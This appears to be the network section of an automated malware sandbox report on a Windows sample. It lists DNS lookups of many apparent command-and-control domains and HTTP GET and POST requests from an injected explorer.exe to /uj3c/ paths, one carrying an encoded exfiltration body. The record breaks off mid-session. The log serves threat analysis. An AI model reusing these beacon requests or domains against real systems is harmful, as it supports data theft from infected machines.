                                                                                                                                        Aug 8, 2022 20:16:08.973506927 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                                                        Aug 8, 2022 20:16:11.081469059 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                                                        Aug 8, 2022 20:16:12.433291912 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                                                        Aug 8, 2022 20:16:14.451654911 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                                                        Aug 8, 2022 20:16:16.113898039 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                                                        Aug 8, 2022 20:16:17.129350901 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                                                        Aug 8, 2022 20:16:19.146061897 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable

                                                                                                                                        DNS Queries

                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                        Aug 8, 2022 20:12:06.922441006 CEST192.168.2.38.8.8.80x669cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:08.069134951 CEST192.168.2.38.8.8.80x603aStandard query (0)2q5ira.ph.files.1drv.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:28.656106949 CEST192.168.2.38.8.8.80xff47Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:29.444283962 CEST192.168.2.38.8.8.80x29c9Standard query (0)2q5ira.ph.files.1drv.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:41.664526939 CEST192.168.2.38.8.8.80x1b23Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:42.633210897 CEST192.168.2.38.8.8.80x7e06Standard query (0)2q5ira.ph.files.1drv.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:13.530627966 CEST192.168.2.38.8.8.80x9a81Standard query (0)www.meigsbuilds.onlineA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:18.930552006 CEST192.168.2.38.8.8.80x198cStandard query (0)www.naturathome.infoA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:24.016206980 CEST192.168.2.38.8.8.80x3325Standard query (0)www.nutricognition.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:29.220875025 CEST192.168.2.38.8.8.80xba55Standard query (0)www.designgamagazine.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:34.659301996 CEST192.168.2.38.8.8.80xb484Standard query (0)www.kidsfundoor.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:39.783365965 CEST192.168.2.38.8.8.80x182aStandard query (0)www.choonchain.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:44.908478022 CEST192.168.2.38.8.8.80x5e17Standard query (0)www.empireapothecary.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:50.639390945 CEST192.168.2.38.8.8.80xada9Standard query (0)www.moneytaoism.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:01.676448107 CEST192.168.2.38.8.8.80x6dabStandard query (0)www.shopwithtrooperdavecom.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:06.960392952 CEST192.168.2.38.8.8.80x64ccStandard query (0)www.6111.siteA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:12.251024008 CEST192.168.2.38.8.8.80xe8d8Standard query (0)www.trendiddas.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:34.505660057 CEST192.168.2.38.8.8.80xe49cStandard query (0)www.trisuaka.xyzA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:39.645056009 CEST192.168.2.38.8.8.80x27cfStandard query (0)www.nomaxdic.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:54.742095947 CEST192.168.2.38.8.8.80xb49cStandard query (0)www.gografic.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:54.765111923 CEST192.168.2.38.8.8.80x9757Standard query (0)www.gografic.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:54.800062895 CEST192.168.2.38.8.8.80x1e0Standard query (0)www.gografic.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:59.877633095 CEST192.168.2.38.8.8.80x762dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:00.858776093 CEST192.168.2.38.8.8.80x762dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:01.909074068 CEST192.168.2.38.8.8.80x762dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:03.956007004 CEST192.168.2.38.8.8.80x762dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:05.042470932 CEST192.168.2.38.8.8.80x851dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:06.061783075 CEST192.168.2.38.8.8.80x851dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:07.413911104 CEST192.168.2.38.8.8.80x851dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:09.431735039 CEST192.168.2.38.8.8.80x851dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:10.081501007 CEST192.168.2.38.8.8.80xf5eaStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:11.094490051 CEST192.168.2.38.8.8.80xf5eaStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:12.109828949 CEST192.168.2.38.8.8.80xf5eaStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:14.125829935 CEST192.168.2.38.8.8.80xf5eaStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:21.767999887 CEST192.168.2.38.8.8.80xbc84Standard query (0)www.wellkept.infoA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:26.877679110 CEST192.168.2.38.8.8.80x59a2Standard query (0)www.forummind.comA (IP address)IN (0x0001)

                                                                                                                                        DNS Answers

                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                        Aug 8, 2022 20:12:06.958794117 CEST8.8.8.8192.168.2.30x669cNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:06.958794117 CEST8.8.8.8192.168.2.30x669cNo error (0)l-0004.l-dc-msedge.net13.107.43.13A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:08.145390987 CEST8.8.8.8192.168.2.30x603aNo error (0)2q5ira.ph.files.1drv.comph-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:08.145390987 CEST8.8.8.8192.168.2.30x603aNo error (0)ph-files.fe.1drv.comodc-ph-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:28.679950953 CEST8.8.8.8192.168.2.30xff47No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:29.500751019 CEST8.8.8.8192.168.2.30x29c9No error (0)2q5ira.ph.files.1drv.comph-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:29.500751019 CEST8.8.8.8192.168.2.30x29c9No error (0)ph-files.fe.1drv.comodc-ph-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:29.500751019 CEST8.8.8.8192.168.2.30x29c9No error (0)l-0003.l-dc-msedge.net13.107.43.12A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:41.684041977 CEST8.8.8.8192.168.2.30x1b23No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:41.684041977 CEST8.8.8.8192.168.2.30x1b23No error (0)l-0004.l-dc-msedge.net13.107.43.13A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:42.675123930 CEST8.8.8.8192.168.2.30x7e06No error (0)2q5ira.ph.files.1drv.comph-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:12:42.675123930 CEST8.8.8.8192.168.2.30x7e06No error (0)ph-files.fe.1drv.comodc-ph-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:13.662398100 CEST8.8.8.8192.168.2.30x9a81No error (0)www.meigsbuilds.online209.17.116.163A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:18.961222887 CEST8.8.8.8192.168.2.30x198cNo error (0)www.naturathome.infonaturathome.infoCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:18.961222887 CEST8.8.8.8192.168.2.30x198cNo error (0)naturathome.info81.169.145.158A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:24.035969973 CEST8.8.8.8192.168.2.30x3325No error (0)www.nutricognition.comnutricognition.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:24.035969973 CEST8.8.8.8192.168.2.30x3325No error (0)nutricognition.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)www.designgamagazine.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:34.687539101 CEST8.8.8.8192.168.2.30xb484No error (0)www.kidsfundoor.comkidsfundoor.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:34.687539101 CEST8.8.8.8192.168.2.30xb484No error (0)kidsfundoor.com2.57.90.16A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:39.852020979 CEST8.8.8.8192.168.2.30x182aName error (3)www.choonchain.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:45.086206913 CEST8.8.8.8192.168.2.30x5e17No error (0)www.empireapothecary.com154.55.180.56A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:14:50.809159994 CEST8.8.8.8192.168.2.30xada9No error (0)www.moneytaoism.com156.226.60.131A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:01.709094048 CEST8.8.8.8192.168.2.30x6dabName error (3)www.shopwithtrooperdavecom.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:07.235305071 CEST8.8.8.8192.168.2.30x64ccName error (3)www.6111.sitenonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:12.281902075 CEST8.8.8.8192.168.2.30xe8d8No error (0)www.trendiddas.com5.183.8.187A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:34.530457973 CEST8.8.8.8192.168.2.30xe49cNo error (0)www.trisuaka.xyz188.114.97.3A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:34.530457973 CEST8.8.8.8192.168.2.30xe49cNo error (0)www.trisuaka.xyz188.114.96.3A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:39.959163904 CEST8.8.8.8192.168.2.30x27cfNo error (0)www.nomaxdic.com38.54.163.57A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:54.761399984 CEST8.8.8.8192.168.2.30xb49cName error (3)www.gografic.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:54.796822071 CEST8.8.8.8192.168.2.30x9757Name error (3)www.gografic.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:15:54.858072996 CEST8.8.8.8192.168.2.30x1e0Name error (3)www.gografic.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:04.895198107 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:05.876121044 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:06.926480055 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:08.973356962 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:10.061058998 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:11.081312895 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:12.433202028 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:14.451484919 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:15.101099968 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:16.113787889 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:17.129256964 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:19.145693064 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:21.797375917 CEST8.8.8.8192.168.2.30xbc84No error (0)www.wellkept.infowellkept.infoCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:21.797375917 CEST8.8.8.8192.168.2.30xbc84No error (0)wellkept.info15.197.142.173A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:21.797375917 CEST8.8.8.8192.168.2.30xbc84No error (0)wellkept.info3.33.152.147A (IP address)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:26.919265985 CEST8.8.8.8192.168.2.30x59a2No error (0)www.forummind.comforummind.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Aug 8, 2022 20:16:26.919265985 CEST8.8.8.8192.168.2.30x59a2No error (0)forummind.com35.244.105.10A (IP address)IN (0x0001)

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • onedrive.live.com
                                                                                                                                        • 2q5ira.ph.files.1drv.com
                                                                                                                                        • www.meigsbuilds.online
                                                                                                                                        • www.naturathome.info
                                                                                                                                        • www.nutricognition.com
                                                                                                                                        • www.designgamagazine.com
                                                                                                                                        • www.kidsfundoor.com
                                                                                                                                        • www.empireapothecary.com
                                                                                                                                        • www.moneytaoism.com
                                                                                                                                        • www.trendiddas.com
                                                                                                                                        • www.trisuaka.xyz
                                                                                                                                        • www.nomaxdic.com

                                                                                                                                        HTTP Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        0192.168.2.34972813.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        1192.168.2.34973713.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        10192.168.2.3498502.57.90.1680C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:14:34.726453066 CEST10084OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1
                                                                                                                                        Host: www.kidsfundoor.com
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:
                                                                                                                                        Aug 8, 2022 20:14:34.763842106 CEST10084INHTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Mon, 08 Aug 2022 18:14:34 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 146
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        11192.168.2.349851154.55.180.5680C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:14:45.330689907 CEST10086OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1
                                                                                                                                        Host: www.empireapothecary.com
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        12192.168.2.349853156.226.60.13180C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:14:51.087372065 CEST10095OUTGET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1
                                                                                                                                        Host: www.moneytaoism.com
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:
                                                                                                                                        Aug 8, 2022 20:14:51.777698040 CEST10095OUTGET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1
                                                                                                                                        Host: www.moneytaoism.com
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        13192.168.2.3498555.183.8.18780C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:15:12.410327911 CEST10103OUTGET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1
                                                                                                                                        Host: www.trendiddas.com
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:
                                                                                                                                        Aug 8, 2022 20:15:12.639900923 CEST10103INHTTP/1.1 404 Not Found
                                                                                                                                        Date: Mon, 08 Aug 2022 18:15:12 GMT
                                                                                                                                        Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                        Content-Length: 280
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 65 6e 64 69 64 64 61 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trendiddas.com Port 80</address></body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        14192.168.2.349856188.114.97.380C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:15:34.555059910 CEST10105OUTPOST /uj3c/ HTTP/1.1
                                                                                                                                        Host: www.trisuaka.xyz
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 411
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Origin: http://www.trisuaka.xyz
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Accept: */*
                                                                                                                                        Referer: http://www.trisuaka.xyz/uj3c/
                                                                                                                                        Accept-Language: en-US
                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                        Data Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        15192.168.2.349857188.114.97.380C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:15:34.577404976 CEST10118OUTPOST /uj3c/ HTTP/1.1
                                                                                                                                        Host: www.trisuaka.xyz
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 36479
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Origin: http://www.trisuaka.xyz
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Accept: */*
                                                                                                                                        Referer: http://www.trisuaka.xyz/uj3c/
                                                                                                                                        Accept-Language: en-US
                                                                                                                                        Accept-Encoding: gzip, deflate
